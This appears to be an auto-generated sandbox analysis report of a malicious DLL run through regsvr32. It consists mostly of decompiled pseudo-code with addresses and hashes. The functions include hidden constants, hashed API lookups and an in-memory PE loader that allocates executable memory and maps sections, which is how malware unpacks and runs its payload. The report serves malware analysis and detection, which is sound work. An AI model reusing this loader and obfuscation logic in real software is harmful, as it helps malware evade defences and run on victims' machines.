				_v12 = _v12 ^ 0x08b4d8b6;
				E10011C78(_v8,  *((intOrPtr*)(__ecx + 4)), _v28, __edx, _v20);
				E100168F4( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(__edx + 8)), _v24, _v32, _v16,  *__ecx, _v12);
				_t89 =  *((intOrPtr*)(__ecx + 4));
				 *((intOrPtr*)(_t102 + 8)) =  *((intOrPtr*)(_t102 + 8)) + _t89;
				return _t89;
			}

0x10011786
0x10011789
0x1001178d
0x10011790
0x10011791
0x10011792
0x10011797
0x1001179d
0x100117a4
0x100117ab
0x100117b8
0x100117bb
0x100117be
0x100117c2
0x100117c9
0x100117d0
0x100117d7
0x100117de
0x100117e5
0x100117f1
0x100117f2
0x100117fb
0x100117fe
0x10011805
0x1001180c
0x10011813
0x10011816
0x1001181d
0x10011824
0x1001182b
0x10011832
0x10011839
0x1001183d
0x10011844
0x1001184b
0x10011852
0x10011859
0x10011865
0x10011868
0x1001186c
0x10011880
0x10011899
0x1001189e
0x100118a4
0x100118ac

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d49567caa09603cc1df0ab85e666edfbd91f7e150e609abdc0cc8ae74b9a5c
Instruction ID: c6712cd19deeabb84ca4df3a74a1fa3170e9ad6e996cda01c6ed10fce0a8b62d
Opcode Fuzzy Hash: 07d49567caa09603cc1df0ab85e666edfbd91f7e150e609abdc0cc8ae74b9a5c
Instruction Fuzzy Hash: F83110B5C0130EEBCB14CFA5CA4A8AEFBB1FB44314F20855AE529A6260D3B55B45DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE15, Relevance: .1, Instructions: 63
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1000FE15(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t76;
				void* _t81;
				signed int _t82;

				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v40 = 0xc8ee0d;
				_v12 = 0xa26247;
				_v12 = _v12 << 0x10;
				_v12 = _v12 | 0x9037dc3e;
				_t81 = __ecx;
				_v12 = _v12 * 0x18;
				_v12 = _v12 ^ 0xbb31a1e6;
				_v8 = 0x5cfd5d;
				_v8 = _v8 ^ 0x40e61077;
				_v8 = _v8 | 0x9a98ae05;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0xd77f084a;
				_v28 = 0x9c509a;
				_v28 = _v28 ^ 0x5e9f0822;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x3587f2cf;
				_v24 = 0x2f8cd0;
				_v24 = _v24 >> 0xc;
				_t76 = 0x1f;
				_v24 = _v24 / _t76;
				_v24 = _v24 ^ 0x00068623;
				_v16 = 0x7c4acd;
				_v16 = _v16 ^ 0xb7a5700c;
				_v16 = _v16 + 0x609b;
				_v16 = _v16 + 0xffff707f;
				_v16 = _v16 ^ 0xb7d90bdf;
				_v20 = 0xbcbeff;
				_v20 = _v20 | 0xbe7cc454;
				_v20 = _v20 * 0x34;
				_v20 = _v20 ^ 0xcb63cbdc;
				_t82 = E10017E33(_v20, _v16);
				_push(3);
				_push(_t82);
				_push(_v24);
				E10010204(_v28, _t81);
				 *((short*)(_t81 + _t82 * 2)) = 0;
				return 0;
			}

0x1000fe1b
0x1000fe21
0x1000fe25
0x1000fe2c
0x1000fe33
0x1000fe37
0x1000fe46
0x1000fe48
0x1000fe4b
0x1000fe52
0x1000fe59
0x1000fe60
0x1000fe67
0x1000fe6b
0x1000fe72
0x1000fe79
0x1000fe80
0x1000fe84
0x1000fe8b
0x1000fe92
0x1000fe99
0x1000fe9c
0x1000fe9f
0x1000fea6
0x1000fead
0x1000feb4
0x1000febb
0x1000fec2
0x1000fec9
0x1000fed0
0x1000fedb
0x1000fede
0x1000fef6
0x1000fefa
0x1000fefc
0x1000fefd
0x1000ff03
0x1000ff0d
0x1000ff16

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3806093786df65bcbc70f7c76e9b5b38081fcee0cd3af81fffd4ec44b0ce02b7
Instruction ID: 787ce9f451500b1854b50a849919a3b163282fbf8f96c20d310ce118e3a2df91
Opcode Fuzzy Hash: 3806093786df65bcbc70f7c76e9b5b38081fcee0cd3af81fffd4ec44b0ce02b7
Instruction Fuzzy Hash: 8E31FFB5C0120EABCB04DFA5D94A6EEFFB1FB40304F2085A9D126B6220C7B51B55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010E34, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E10010E34(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t40;
				intOrPtr* _t45;
				signed int _t48;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t40);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x7167f6;
				_v16 = 0xf0e5f6;
				_push("true");
				_pop(_t48);
				_v16 = _v16 * 0x2b;
				_v16 = _v16 | 0x4f9c5d53;
				_v16 = _v16 ^ 0x6ff2582b;
				_v8 = 0xac4833;
				_v8 = _v8 / _t48;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000d2511;
				_v12 = 0xc19814;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff7c34;
				_v12 = _v12 ^ 0xc19aa076;
				_t45 = E1001F90C(0x94848034, 0x1ce, 0xe587625e);
				return  *_t45(_a12, _v16, _v8, _v12);
			}

0x10010e3a
0x10010e3d
0x10010e40
0x10010e43
0x10010e44
0x10010e45
0x10010e4a
0x10010e50
0x10010e54
0x10010e5b
0x10010e66
0x10010e68
0x10010e69
0x10010e6c
0x10010e73
0x10010e7a
0x10010e90
0x10010e93
0x10010e96
0x10010e9a
0x10010ea1
0x10010ea8
0x10010eac
0x10010eb3
0x10010ec8
0x10010ed8

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5b390add29e48817854b18870711f7e7d5e061359e6e737f63aea27ea4ad09
Instruction ID: 02908db973b211f1721c4bddfdf0e21c61a768f25b445a539b37912f309934a4
Opcode Fuzzy Hash: 2a5b390add29e48817854b18870711f7e7d5e061359e6e737f63aea27ea4ad09
Instruction Fuzzy Hash: 3511E3B5C01208FFCF45DFE4C946ADEBBB1EB44304F10C099E915A6191D7758B94AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10011E59, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011E59() {

				return  *[fs:0x30];
			}

0x10011e5f

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 5036 Parent PID: 4252 regsvr32.exeCOMMON

Executed Functions

Function 6EDCE310, Relevance: 54.3, APIs: 36, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EDCE310(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				char* _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				char _v248;
				char _v292;
				char _v316;
				char _v340;
				char _v364;
				intOrPtr _t169;
				intOrPtr _t187;
				intOrPtr _t198;
				intOrPtr _t202;
				void* _t228;
				void* _t304;
				void* _t305;
				intOrPtr _t306;
				void* _t309;
				void* _t314;
				void* _t317;

				_t305 = __esi;
				_t304 = __edi;
				_t228 = __ebx;
				_push(0xffffffff);
				_push(E6EE56378);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t306;
				_v20 = __ecx;
				E6EDB18A0( &_v104, __eflags, 0x6ee572e4);
				_v8 = 0;
				E6EDB18A0( &_v200, __eflags, 0x6ee572e8);
				_v8 = 1;
				E6EDB12B0(__eflags,  &_v152,  &_v200, 0x6ee572ec);
				_v8 = 2;
				E6EDB30F0( &_v152);
				_push(E6EDB2660( &_v152));
				E6EDB1340(_t161);
				_t309 = _t306 - 0x15c + 0x10;
				_t12 = _v20 + 4; // 0xe96ee680
				if(( *_t12 & 0x000000ff) == 0) {
					E6EDB12B0(__eflags,  &_v128,  &_v104, 0x6ee572f0);
					_v8 = 3;
					E6EDCDC90(__eflags,  &_v292); // executed
					_v8 = 4;
					E6EDB2BC0(__eflags,  &_v176,  &_v128,  &_v104);
					_v8 = 5;
					_t169 = E6EDCDED0(_v20, __eflags,  &_v292); // executed
					 *_v20 = _t169;
					_v36 = E6EDB2BC0(__eflags,  &_v316,  &_v104,  &_v128);
					_v40 = _v36;
					_v8 = 6;
					E6EDCB5D0(_v36,  &_v224, _v40,  &_v176);
					_t314 = _t309 + 0x34;
					_v8 = 8;
					E6EDB1D80( &_v316);
					__eflags =  *_v20;
					if(__eflags != 0) {
						__eflags = E6EDCDA40(_v20, __eflags,  *_v20);
						if(__eflags != 0) {
							_v52 = E6EDB2BC0(__eflags,  &_v364,  &_v224,  &_v104);
							_v56 = _v52;
							_v8 = 9;
							_v60 = E6EDCB5D0(_v56,  &_v340, _v56,  &_v128);
							_v64 = _v60;
							_v8 = 0xa;
							E6EDCB5D0(_v64,  &_v248, _v64,  &_v176);
							_t317 = _t314 + 0x24;
							_v8 = 0xc;
							E6EDB1D80( &_v340);
							_v8 = 0xd;
							E6EDB1D80( &_v364);
							_t187 = E6EDCD650(_v20,  *_v20);
							__eflags = _t187;
							if(_t187 != 0) {
								_v28 =  &_v248;
								_v24 = E6EDB2660(_v28);
								_v72 = E6EDCD2B0(_v28);
								while(1) {
									__eflags = _v24 - _v72;
									if(_v24 == _v72) {
										break;
									}
									_v76 = _v24;
									_push( *_v76);
									E6EE3E6E9(_t228, _t304, _t305);
									_t317 = _t317 + 4;
									_t202 = _v24 + 1;
									__eflags = _t202;
									_v24 = _t202;
								}
								 *(_v20 + 4) = 1;
								_v80 = 0;
								_v8 = 8;
								E6EDB1D80( &_v248);
								_v8 = 5;
								E6EDB1D80( &_v224);
								_v8 = 4;
								E6EDB1D80( &_v176);
								_v8 = 3;
								E6EDCC420( &_v292); // executed
								_v8 = 2;
								E6EDB1D80( &_v128);
								_v8 = 1;
								E6EDB1D80( &_v152);
								_v8 = 0;
								E6EDB1D80( &_v200);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v104);
								_t198 = _v80;
							} else {
								_v68 = 1;
								_v8 = 8;
								E6EDB1D80( &_v248);
								_v8 = 5;
								E6EDB1D80( &_v224);
								_v8 = 4;
								E6EDB1D80( &_v176);
								_v8 = 3;
								E6EDCC420( &_v292);
								_v8 = 2;
								E6EDB1D80( &_v128);
								_v8 = 1;
								E6EDB1D80( &_v152);
								_v8 = 0;
								E6EDB1D80( &_v200);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v104);
								_t198 = _v68;
							}
						} else {
							_v48 = 1;
							_v8 = 5;
							E6EDB1D80( &_v224);
							_v8 = 4;
							E6EDB1D80( &_v176);
							_v8 = 3;
							E6EDCC420( &_v292);
							_v8 = 2;
							E6EDB1D80( &_v128);
							_v8 = 1;
							E6EDB1D80( &_v152);
							_v8 = 0;
							E6EDB1D80( &_v200);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v104);
							_t198 = _v48;
						}
					} else {
						_v44 = 1;
						_v8 = 5;
						E6EDB1D80( &_v224);
						_v8 = 4;
						E6EDB1D80( &_v176);
						_v8 = 3;
						E6EDCC420( &_v292);
						_v8 = 2;
						E6EDB1D80( &_v128);
						_v8 = 1;
						E6EDB1D80( &_v152);
						_v8 = 0;
						E6EDB1D80( &_v200);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v104);
						_t198 = _v44;
					}
				} else {
					_v32 = 0;
					_v8 = 1;
					E6EDB1D80( &_v152);
					_v8 = 0;
					E6EDB1D80( &_v200);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v104);
					_t198 = _v32;
				}
				 *[fs:0x0] = _v16;
				return _t198;
			}

0x6edce310
0x6edce310
0x6edce310
0x6edce313
0x6edce315
0x6edce320
0x6edce321
0x6edce32e
0x6edce339
0x6edce33e
0x6edce350
0x6edce355
0x6edce36c
0x6edce374
0x6edce37e
0x6edce38e
0x6edce38f
0x6edce394
0x6edce39a
0x6edce3a0
0x6edce3eb
0x6edce3f3
0x6edce3fe
0x6edce406
0x6edce419
0x6edce421
0x6edce42f
0x6edce437
0x6edce457
0x6edce45d
0x6edce460
0x6edce46f
0x6edce474
0x6edce477
0x6edce481
0x6edce489
0x6edce48c
0x6edce511
0x6edce513
0x6edce5af
0x6edce5b5
0x6edce5b8
0x6edce5cf
0x6edce5d5
0x6edce5d8
0x6edce5e7
0x6edce5ec
0x6edce5ef
0x6edce5f9
0x6edce5fe
0x6edce608
0x6edce616
0x6edce61b
0x6edce61d
0x6edce6ad
0x6edce6b8
0x6edce6c3
0x6edce6d1
0x6edce6d4
0x6edce6d7
0x00000000
0x00000000
0x6edce6dc
0x6edce6e5
0x6edce6e6
0x6edce6eb
0x6edce6cb
0x6edce6cb
0x6edce6ce
0x6edce6ce
0x6edce6f3
0x6edce6f7
0x6edce6fe
0x6edce708
0x6edce70d
0x6edce717
0x6edce71c
0x6edce726
0x6edce72b
0x6edce735
0x6edce73a
0x6edce741
0x6edce746
0x6edce750
0x6edce755
0x6edce75f
0x6edce764
0x6edce76e
0x6edce773
0x6edce623
0x6edce623
0x6edce62a
0x6edce634
0x6edce639
0x6edce643
0x6edce648
0x6edce652
0x6edce657
0x6edce661
0x6edce666
0x6edce66d
0x6edce672
0x6edce67c
0x6edce681
0x6edce68b
0x6edce690
0x6edce69a
0x6edce69f
0x6edce69f
0x6edce515
0x6edce515
0x6edce51c
0x6edce526
0x6edce52b
0x6edce535
0x6edce53a
0x6edce544
0x6edce549
0x6edce550
0x6edce555
0x6edce55f
0x6edce564
0x6edce56e
0x6edce573
0x6edce57d
0x6edce582
0x6edce582
0x6edce48e
0x6edce48e
0x6edce495
0x6edce49f
0x6edce4a4
0x6edce4ae
0x6edce4b3
0x6edce4bd
0x6edce4c2
0x6edce4c9
0x6edce4ce
0x6edce4d8
0x6edce4dd
0x6edce4e7
0x6edce4ec
0x6edce4f6
0x6edce4fb
0x6edce4fb
0x6edce3a2
0x6edce3a2
0x6edce3a9
0x6edce3b3
0x6edce3b8
0x6edce3c2
0x6edce3c7
0x6edce3d1
0x6edce3d6
0x6edce3d6
0x6edce779
0x6edce783

APIs

task.LIBCPMTD ref: 6EDCE3B3
task.LIBCPMTD ref: 6EDCE3C2
task.LIBCPMTD ref: 6EDCE3D1
task.LIBCPMTD ref: 6EDCE481
task.LIBCPMTD ref: 6EDCE49F
task.LIBCPMTD ref: 6EDCE4AE
~.LIBCPMTD ref: 6EDCE4BD
task.LIBCPMTD ref: 6EDCE4C9
task.LIBCPMTD ref: 6EDCE4D8
task.LIBCPMTD ref: 6EDCE4E7
task.LIBCPMTD ref: 6EDCE4F6

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 46963432f1914b24780a67ed54ec66a19d303198298682ea20aab68dcadcc7ab
Instruction ID: 702c39c8aa70a68f4eede7af923c58c691afa2af542018a6523c98201b259921
Opcode Fuzzy Hash: 46963432f1914b24780a67ed54ec66a19d303198298682ea20aab68dcadcc7ab
Instruction Fuzzy Hash: 4ED14BB0C11248DEDB15DBE4C950BEEBBB8AF15348F1489D8D05667281EB746F48CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDED0, Relevance: 22.7, APIs: 15, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EDCDED0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed short* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				intOrPtr _v44;
				signed short* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				intOrPtr _v76;
				char _v100;
				char _v124;
				signed short* _t117;
				intOrPtr _t122;
				void* _t127;
				void* _t134;
				void* _t151;
				void* _t181;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t208;
				void* _t209;
				void* _t213;
				void* _t214;

				_push(0xffffffff);
				_push(E6EE562E5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t208;
				_t209 = _t208 - 0x6c;
				_v76 = __ecx;
				_t156 =  &_v124;
				E6EDB18A0( &_v124, __eflags, 0x6ee57304);
				_v8 = 0;
				_v36 = 0;
				while(1) {
					_t216 = _v36 - 0xa;
					if(_v36 >= 0xa) {
						break;
					}
					_t151 = E6EE3ACED(_t156, _t216);
					_t156 =  &_v124;
					E6EDB3620( &_v124, _t151);
					_v36 = _v36 + 1;
				}
				E6EDB12B0(__eflags,  &_v100,  &_v124, 0x6ee57308);
				_v8 = 1;
				E6EDB30F0( &_v100);
				_push(E6EDB2660( &_v100));
				E6EDB1340(_t113);
				_v44 = E6EDB3850(_a4);
				_push(_v44); // executed
				_t117 = E6EE3ACE2(); // executed
				_v48 = _t117;
				E6EE37600(_v48, E6EDB37A0(_a4), _v44);
				_t213 = _t209 + 0x20;
				_v28 = 0;
				_v24 = _v48;
				__eflags = ( *_v24 & 0x0000ffff) - 0x5a4d;
				if(( *_v24 & 0x0000ffff) == 0x5a4d) {
					_t32 =  &(_v24[0x1e]); // 0xf5ba5ae9
					_v20 = _v24 +  *_t32;
					__eflags =  *_v20 - 0x4550;
					if( *_v20 == 0x4550) {
						_t122 = _v20;
						__eflags = ( *(_t122 + 4) & 0x0000ffff) - 0x14c;
						if(( *(_t122 + 4) & 0x0000ffff) == 0x14c) {
							_t197 = _v20;
							__eflags =  *(_t197 + 0xe8);
							if( *(_t197 + 0xe8) == 0) {
								_t60 =  &(_v24[0x1e]); // 0xf5ba5ae9
								_t63 =  &(_v24[0x7c]); // 0xf5ba5be1
								_v32 = _t63 +  *_t60;
								_t127 = VirtualAlloc( *(_v20 + 0x34),  *(_v20 + 0x50), 0x3000, 0x40); // executed
								_v28 = _t127;
								__eflags = _v28;
								if(_v28 == 0) {
									do {
										__eflags = 0;
									} while (0 != 0);
									_v28 = VirtualAlloc(0,  *(_v20 + 0x50), 0x3000, 0x40);
								}
								__eflags = _v28;
								if(_v28 != 0) {
									E6EE37600(_v28, _v24,  *((intOrPtr*)(_v20 + 0x54)));
									_t214 = _t213 + 0xc;
									_v40 = 0;
									while(1) {
										_t201 = _v20;
										__eflags = _v40 - ( *(_t201 + 6) & 0x0000ffff);
										if(_v40 >= ( *(_t201 + 6) & 0x0000ffff)) {
											break;
										}
										E6EE37600( *((intOrPtr*)(_v32 + 0xc)) + _v28,  *((intOrPtr*)(_v32 + 0x14)) + _v24,  *((intOrPtr*)(_v32 + 0x10)));
										_t214 = _t214 + 0xc;
										_v32 = _v32 + 0x28;
										_t181 = _v40 + 1;
										__eflags = _t181;
										_v40 = _t181;
									}
									_v72 = _v28;
									_v8 = 0;
									E6EDB1D80( &_v100);
									_v8 = 0xffffffff;
									E6EDB1D80( &_v124);
									_t134 = _v72;
								} else {
									do {
										__eflags = 0;
									} while (0 != 0);
									_v68 = 0;
									_v8 = 0;
									E6EDB1D80( &_v100);
									_v8 = 0xffffffff;
									E6EDB1D80( &_v124);
									_t134 = _v68;
								}
							} else {
								_v64 = 0;
								_v8 = 0;
								E6EDB1D80( &_v100);
								_v8 = 0xffffffff;
								E6EDB1D80( &_v124);
								_t134 = _v64;
							}
						} else {
							do {
								__eflags = 0;
							} while (0 != 0);
							_v60 = 0;
							_v8 = 0;
							E6EDB1D80( &_v100);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v124);
							_t134 = _v60;
						}
					} else {
						_v56 = 0;
						_v8 = 0;
						E6EDB1D80( &_v100);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v124);
						_t134 = _v56;
					}
				} else {
					_v52 = 0;
					_v8 = 0;
					E6EDB1D80( &_v100);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v124);
					_t134 = _v52;
				}
				 *[fs:0x0] = _v16;
				return _t134;
			}

0x6edcded3
0x6edcded5
0x6edcdee0
0x6edcdee1
0x6edcdee8
0x6edcdeeb
0x6edcdef3
0x6edcdef6
0x6edcdefb
0x6edcdf02
0x6edcdf14
0x6edcdf14
0x6edcdf18
0x00000000
0x00000000
0x6edcdf1a
0x6edcdf20
0x6edcdf23
0x6edcdf11
0x6edcdf11
0x6edcdf37
0x6edcdf3f
0x6edcdf46
0x6edcdf53
0x6edcdf54
0x6edcdf64
0x6edcdf6a
0x6edcdf6b
0x6edcdf73
0x6edcdf87
0x6edcdf8c
0x6edcdf8f
0x6edcdf99
0x6edcdfa2
0x6edcdfa8
0x6edcdfd7
0x6edcdfdd
0x6edcdfe3
0x6edcdfe9
0x6edce015
0x6edce01c
0x6edce022
0x6edce05a
0x6edce05d
0x6edce062
0x6edce091
0x6edce097
0x6edce09e
0x6edce0b6
0x6edce0bc
0x6edce0bf
0x6edce0c3
0x6edce0c5
0x6edce0c5
0x6edce0c5
0x6edce0df
0x6edce0df
0x6edce0e2
0x6edce0e6
0x6edce125
0x6edce12a
0x6edce12d
0x6edce13f
0x6edce13f
0x6edce146
0x6edce149
0x00000000
0x00000000
0x6edce166
0x6edce16b
0x6edce174
0x6edce139
0x6edce139
0x6edce13c
0x6edce13c
0x6edce17c
0x6edce17f
0x6edce186
0x6edce18b
0x6edce195
0x6edce19a
0x6edce0e8
0x6edce0e8
0x6edce0e8
0x6edce0e8
0x6edce0ec
0x6edce0f3
0x6edce0fa
0x6edce0ff
0x6edce109
0x6edce10e
0x6edce10e
0x6edce064
0x6edce064
0x6edce06b
0x6edce072
0x6edce077
0x6edce081
0x6edce086
0x6edce086
0x6edce024
0x6edce024
0x6edce024
0x6edce024
0x6edce028
0x6edce02f
0x6edce036
0x6edce03b
0x6edce045
0x6edce04a
0x6edce04a
0x6edcdfeb
0x6edcdfeb
0x6edcdff2
0x6edcdff9
0x6edcdffe
0x6edce008
0x6edce00d
0x6edce00d
0x6edcdfaa
0x6edcdfaa
0x6edcdfb1
0x6edcdfb8
0x6edcdfbd
0x6edcdfc7
0x6edcdfcc
0x6edcdfcc
0x6edce1a0
0x6edce1aa

APIs

Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 6EDCDF23
task.LIBCPMTD ref: 6EDCDFB8
task.LIBCPMTD ref: 6EDCDFC7
task.LIBCPMTD ref: 6EDCDFF9
task.LIBCPMTD ref: 6EDCE008
task.LIBCPMTD ref: 6EDCE036
task.LIBCPMTD ref: 6EDCE045

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_context
String ID:
API String ID: 600748487-0
Opcode ID: 0156ddc05a0f33e8b37165109c8b5a308a6f214a2f82ac14d3d577a533c2ef48
Instruction ID: b1ab12aa86311f1ee59ef84dcaee9d9a720bd62eb314a66bcb29ccf3ec9ea2c2
Opcode Fuzzy Hash: 0156ddc05a0f33e8b37165109c8b5a308a6f214a2f82ac14d3d577a533c2ef48
Instruction Fuzzy Hash: CA915AB0D14209DFDB04DFE4C895BEEBBB9BF44344F244558E4156B2C0EB34AA45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCD740, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EDCD740(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v21;
				void* _v22;
				signed int _v23;
				void* _v24;
				signed int _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v72;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v120;
				char _v128;
				char _v152;
				char _v176;
				void* _t102;
				intOrPtr _t105;
				signed char _t109;
				signed int _t127;
				signed int _t172;
				intOrPtr _t190;
				intOrPtr _t191;

				_push(0xffffffff);
				_push(E6EE56233);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t190;
				_push(__ecx);
				_t191 = _t190 - 0x9c;
				_v20 = _t191;
				_v40 = 0;
				_t3 =  &_v176; // 0x6ee57334
				E6EDB18A0(_t3, __eflags, "z");
				_v8 = 0;
				_v8 = 1;
				_v100 = E6EDB1D00( &_v52, _a8);
				_v8 = 2;
				E6EDB1EB0( &_v52,  &_v104);
				_v56 = 0xa00000 / E6EDB29F0(_a8);
				_v108 = E6EDCC120( &_v72);
				_v8 = 3;
				E6EDB1B00( &_v152);
				_v8 = 4;
				while(1 != 0) {
					E6EDB1B00( &_v96);
					_v8 = 5;
					E6EDB1ED0( &_v52, 1, 1,  &_v96);
					_t109 = E6EDCB5B0( &_v96, 0x6ee57294);
					_t191 = _t191 + 8;
					_v21 = _t109;
					if((_v21 & 0x000000ff) == 0) {
						_v32 = 0;
						while(1) {
							__eflags = _v32 - E6EDB29F0( &_v96);
							if(__eflags >= 0) {
								break;
							}
							E6EDB3620( &_v152,  *(E6EDB2D90( &_v96, _v32)) & 0x000000ff); // executed
							_v36 = 0;
							while(1) {
								__eflags = _v36 - _v56;
								if(_v36 >= _v56) {
									break;
								}
								_v60 = E6EDCC5D0( &_v72,  &_v36);
								E6EDB3620(_v60,  *(E6EDB2D90( &_v96, _v32)) & 0x000000ff); // executed
								_t172 = _v36 + 1;
								__eflags = _t172;
								_v36 = _t172;
							}
							_t127 = _v32 + 1;
							__eflags = _t127;
							_v32 = _t127;
						}
						_v22 = E6EDB26F0( &_v52, __eflags);
						_v23 = _v22;
						__eflags = (_v23 & 0x000000ff) - 0xc3;
						if((_v23 & 0x000000ff) != 0xc3) {
							E6EDB1B70( &_v120, "#4");
							E6EE37B80( &_v120, 0x6ee67f10);
						}
						while(1) {
							_v64 = E6EDCDDB0( &_v52);
							__eflags = _v64 % 0x10;
							if(__eflags == 0) {
								break;
							}
							_v24 = E6EDB26F0( &_v52, __eflags);
							_v25 = _v24;
							__eflags = (_v25 & 0x000000ff) - 0xcc;
							if((_v25 & 0x000000ff) != 0xcc) {
								E6EDB1B70( &_v128, "#3");
								E6EE37B80( &_v128, 0x6ee67f10);
							}
						}
						_v8 = 4;
						E6EDB1D80( &_v96);
						continue;
					} else {
						_v8 = 4;
						E6EDB1D80( &_v96);
					}
					break;
				}
				E6EDB1840(_a4,  &_v152);
				_v40 = _v40 | 0x00000001;
				_v8 = 3;
				E6EDB1D80( &_v152);
				_v8 = 2;
				_t102 = E6EDCC3E0( &_v72); // executed
				_v8 = 1;
				E6EDB1DC0(_t102,  &_v52);
				_v8 = 0xffffffff;
				_t85 =  &_v176; // 0x6ee57334
				E6EDB1D80(_t85);
				_t105 = _a4;
				 *[fs:0x0] = _v16;
				return _t105;
			}

0x6edcd743
0x6edcd745
0x6edcd750
0x6edcd751
0x6edcd758
0x6edcd759
0x6edcd762
0x6edcd765
0x6edcd771
0x6edcd777
0x6edcd77c
0x6edcd783
0x6edcd793
0x6edcd796
0x6edcd7a1
0x6edcd7b9
0x6edcd7c4
0x6edcd7c7
0x6edcd7d1
0x6edcd7d6
0x6edcd7da
0x6edcd7ea
0x6edcd7ef
0x6edcd7fa
0x6edcd808
0x6edcd80d
0x6edcd810
0x6edcd819
0x6edcd82c
